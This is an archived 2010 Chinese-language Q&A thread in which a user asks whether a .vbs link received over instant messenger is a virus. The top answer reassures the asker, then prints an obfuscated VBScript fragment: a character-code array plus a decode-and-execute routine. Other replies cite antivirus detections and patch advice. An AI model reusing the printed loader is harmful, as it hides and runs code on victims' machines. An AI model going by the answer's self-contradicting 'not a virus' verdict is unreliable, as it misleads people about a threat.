這是我一個同學用即時通傳來的網址
好像是宣傳自己的東西
可是這是文件欸
副檔名又怪怪的
很想知道裡面是什麼
可是怕有毒= =
所以想麻煩家裡防毒強的幫我看一下
謝謝^^
!!!!!防毒不夠強不要亂試,如果真的有毒不要找我!!!!!!
更新1:
痾...我是有點過啦~礙於好奇心嘛= = 可是我點進去他是一個下載檔 我覺得怪怪的所以沒下載給他按取消 這樣應該不致於有事吧? --- 還有大家加為什麼不用回答呢? 我覺得這也算是解答阿~
想請大家幫我看一下這個網址有沒有毒
2010-07-06 12:53 am
http://www.toktokenglish.com/inc/play.vbs
這是我一個同學用即時通傳來的網址
好像是宣傳自己的東西
可是這是文件欸
副檔名又怪怪的
很想知道裡面是什麼
可是怕有毒= =
所以想麻煩家裡防毒強的幫我看一下
謝謝^^
!!!!!防毒不夠強不要亂試,如果真的有毒不要找我!!!!!!
這是我一個同學用即時通傳來的網址
好像是宣傳自己的東西
可是這是文件欸
副檔名又怪怪的
很想知道裡面是什麼
可是怕有毒= =
所以想麻煩家裡防毒強的幫我看一下
謝謝^^
!!!!!防毒不夠強不要亂試,如果真的有毒不要找我!!!!!!
回答 (5)
2010-07-06 7:59 am
✔ 最佳答案
我下載試了一下這檔案不是病毒
請版大放100%心
我分析了一下
發現它裡面都是一些數據和英文字
我拿後小段給你看一下
104,103,41,37,34,13,10,71,89,85,102,116,117,102,84,89,32,61,32,82,101,112,108,97,99,101,40,71,89,85,102,116,117,102,84,89,44,32,34,37,44,40,109,104,103,41,38,34,44,99,104,114,40,57,41,41,13,10,71,89,85,102,116,117,102,84,89,32,61,32,82,101,112,108,97,99,101,40,71,89,85,102,116,117,102,84,89,44,32,34,-12624,34,44,32,99,104,114,40,51,52,41,41,13,10,71,89,85,102,116,117,102,84,89,32,61,32,82,101,112,108,97,99,101,40,71,89,85,102,116,117,102,84,89,44,32,34,-14418,34,44,32,99,104,114,40,51,57,41,41,13,10,101,120,101,99,117,116,101,40,77,121,69,110,99,111,100,101,40,71,89,85,102,116,117,102,84,89,41,41,13,10,102,117,110,99,116,105,111,110,32,77,121,69,110,99,111,100,101,40,104,97,99,107,53,50,48,111,114,103,41,13,10,115,122,32,61,32,83,112,108,105,116,40,104,97,99,107,53,50,48,111,114,103,44,32,34,38,44,40,109,104,103,41,37,34,41,13,10,70,111,114,32,105,32,61,32,85,66,111,117,110,100,40,115,122,41,32,84,111,32,48,32,83,116,101,112,32,45,49,13,10,119,101,105,119,101,105,32,61,32,119,101,105,119,101,105,32,43,32,115,122,40,105,41,32,43,32,118,98,99,114,108,102,13,10,78,101,120,116,13,10,77,121,69,110,99,111,100,101,61,119,101,105,119,101,105,13,10,101,110,100,32,102,117,110,99,116,105,111,110"
Function ChrData(Data)
MyArray = Split(Data, ",", -1, 1)
For each OldData in MyArray
Newdata=NewData&chr(OldData)
Next
ChrData=NewData
End function
execute Chrdata(data)
2010-07-06 00:00:54 補充:
可能只是破壞電腦裡面的一些正常數據
讓電腦出一些小問題而已
2010-07-06 5:46 pm
http://www.virustotal.com/zh-tw/
檔案上傳到這邊做分析
有三個判為病毒
我自己電腦實驗 防毒軟體是江民防毒
檔案下載沒事 雙擊後 查殺到網頁病毒
給你參考
基本上 若是你朋友從即時通傳來 傳後又置之不理
你回問他 也沒回 或是就馬上離線
這種都幾乎是他電腦被病毒感染發送所有朋友列訊息的
可以這樣簡單判斷
檔案上傳到這邊做分析
有三個判為病毒
我自己電腦實驗 防毒軟體是江民防毒
檔案下載沒事 雙擊後 查殺到網頁病毒
給你參考
基本上 若是你朋友從即時通傳來 傳後又置之不理
你回問他 也沒回 或是就馬上離線
這種都幾乎是他電腦被病毒感染發送所有朋友列訊息的
可以這樣簡單判斷
參考: 自己 網路
2010-07-06 5:41 am
版大大概有也重這病毒了吧?(有進去的話AA)
2010-07-06 5:04 am
簡單來說:
*這是一個病毒網頁
意義要讓其他人一起中獎。
點進去將會得到 頭獎:[麻煩]
*相對著你的同學已經中獎了。
小弟的意見大致上與樓上相同。
*這是一個病毒網頁
意義要讓其他人一起中獎。
點進去將會得到 頭獎:[麻煩]
*相對著你的同學已經中獎了。
小弟的意見大致上與樓上相同。
2010-07-06 1:47 am
依檔名來看,就知一種惡意詞法的VBS的病毒。
請依作業系統和使用IE的版本,去微軟的下載中心,下載KB981349的VBScript (5.6或5.7或5.8) 安全性更新,回來安裝以避免被利用此一漏洞造成攻擊或中毒。
PS.必要時也請將Jscript 5.8、ActiveX Killbits 這類的安全性更新,都下載回來安裝。
PS1.嫌煩麻的話,請利用自動更新,或Windows Update。幫您檢杳和安裝。
PS2.同時也請您同學的電腦去掃毒。
2010-07-06 01:24:07 補充:
已將play.vbs提交給Microsoft Security Essentials做病毒分析了。
可能1-2天就知道結果了。
2010-07-06 01:24:16 補充:
2010/5/9 提交過waigua_2_850883.exe這個外掛,原先Security Essentials和avast!5.0防毒都沒偵測出病毒,現已證實為Trojan:Win32/Startpage.AEF (網頁首頁的綁病毒了)
它就是淘寶網(杬惘厙)綁架IE首頁的病毒之一,此綁架手法會修改登錄值的使用權限外,同時也會刧持[搜尋]的[搜尋結果]並連結到hxxp://bg.go4321.com/。
2010/06/01提交的_lnk.zip (-ñk¿α¼_ñ_.lnk )→證實並列為TrojanDownloader:BAT/Lnkget.AG 病毒。
2010-07-06 07:30:21 補充:
Microsoft Security Essentials防毒分析結果,已回覆play.vbs不是惡意檔案。
請依作業系統和使用IE的版本,去微軟的下載中心,下載KB981349的VBScript (5.6或5.7或5.8) 安全性更新,回來安裝以避免被利用此一漏洞造成攻擊或中毒。
PS.必要時也請將Jscript 5.8、ActiveX Killbits 這類的安全性更新,都下載回來安裝。
PS1.嫌煩麻的話,請利用自動更新,或Windows Update。幫您檢杳和安裝。
PS2.同時也請您同學的電腦去掃毒。
2010-07-06 01:24:07 補充:
已將play.vbs提交給Microsoft Security Essentials做病毒分析了。
可能1-2天就知道結果了。
2010-07-06 01:24:16 補充:
2010/5/9 提交過waigua_2_850883.exe這個外掛,原先Security Essentials和avast!5.0防毒都沒偵測出病毒,現已證實為Trojan:Win32/Startpage.AEF (網頁首頁的綁病毒了)
它就是淘寶網(杬惘厙)綁架IE首頁的病毒之一,此綁架手法會修改登錄值的使用權限外,同時也會刧持[搜尋]的[搜尋結果]並連結到hxxp://bg.go4321.com/。
2010/06/01提交的_lnk.zip (-ñk¿α¼_ñ_.lnk )→證實並列為TrojanDownloader:BAT/Lnkget.AG 病毒。
2010-07-06 07:30:21 補充:
Microsoft Security Essentials防毒分析結果,已回覆play.vbs不是惡意檔案。
收錄日期: 2021-04-24 10:35:51
原文連結 [永久失效]:
https://hk.answers.yahoo.com/question/index?qid=20100705000016KK06410